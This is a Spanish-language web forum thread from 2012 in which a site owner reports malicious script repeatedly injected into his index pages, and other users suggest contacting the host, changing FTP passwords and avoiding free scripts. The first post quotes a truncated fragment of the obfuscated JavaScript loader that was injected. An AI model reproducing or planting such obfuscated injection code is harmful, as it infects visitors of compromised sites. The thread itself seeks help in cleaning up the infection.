Foros del Web » Creando para Internet » HTML »

Código malicioso en mis webs

Estas en el tema de Código malicioso en mis webs en el foro de HTML en Foros del Web. Hola, tengo un problema con un código malicioso que no deja de escribirse en el índex de alguna de mis webs. Este es el codigo: ...
  #1 (permalink)  
Antiguo 25/04/2012, 13:50
 
Fecha de Ingreso: diciembre-2004
Mensajes: 35
Antigüedad: 19 años, 4 meses
Puntos: 0
Código malicioso en mis webs

Hola, tengo un problema con un código malicioso que no deja de escribirse en el índex de alguna de mis webs.
Este es el codigo:
<script>i=0;try{prototype;}catch(egewgsd){if(windo w.document
)f=['-32k-32k64k61k-9k-1k59k70k58k76k68k60k69k75k5k62k60k75k
28k67k60k68k60k69k75k74k25k80k43k56k62k37k56k68k60 k-1k-2k57k
70k59k80k-2k0k50k7k52k0k82k-28k-32k-32k-32k64k61k73k56k68k60.......

Coloco una nueva copia del índex y a los pocos días vuelve a aparecer, como puedo solucionar esto?

gracias
  #2 (permalink)  
Antiguo 25/04/2012, 18:33
Avatar de emprear
Colaborador
 
Fecha de Ingreso: junio-2007
Ubicación: me mudé
Mensajes: 8.388
Antigüedad: 16 años, 9 meses
Puntos: 1567
Respuesta: Código malicioso en mis webs

llamando al administrador de tu hosting y q u e j a n d o t e !!!!

Saludos
__________________
La voz de las antenas va, sustituyendo a Dios.
Cuando finalice la mutación, nueva edad media habrá
S.R.
  #3 (permalink)  
Antiguo 25/04/2012, 19:06
Avatar de ArturoGallegos
Moderador
 
Fecha de Ingreso: febrero-2008
Ubicación: Morelia, México
Mensajes: 6.774
Antigüedad: 16 años, 1 mes
Puntos: 1146
Respuesta: Código malicioso en mis webs

la mayoria de estos incidentes son ataques via ftp empieza por cambiar tus contraseñas y asegurate de usar claves fuertes de 8 o mas digitos y alfanumericas al azar nada de palabras

si el problema persiste contacta a tu hosting puede ser que este infectado, pero yo le voy mas a que se corrige con cambiar las claves ftp y asegurandote de limpiar todos los archivos de tu hosting
  #4 (permalink)  
Antiguo 26/04/2012, 12:06
Colaborador
 
Fecha de Ingreso: junio-2007
Mensajes: 5.798
Antigüedad: 16 años, 10 meses
Puntos: 539
Respuesta: Código malicioso en mis webs

También suelen ser el pago por cositas de esas gratis (relojes, scripts muu chulos y tanta morralla como se ofertan por ahí)

Que no digo que sea el caso, pero no sería el primero
__________________
Por una web con mucho estilo
+++ CUENTA ABANDONADA. ¿la quieres? +++

Etiquetas: malicioso, webs
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 13:24.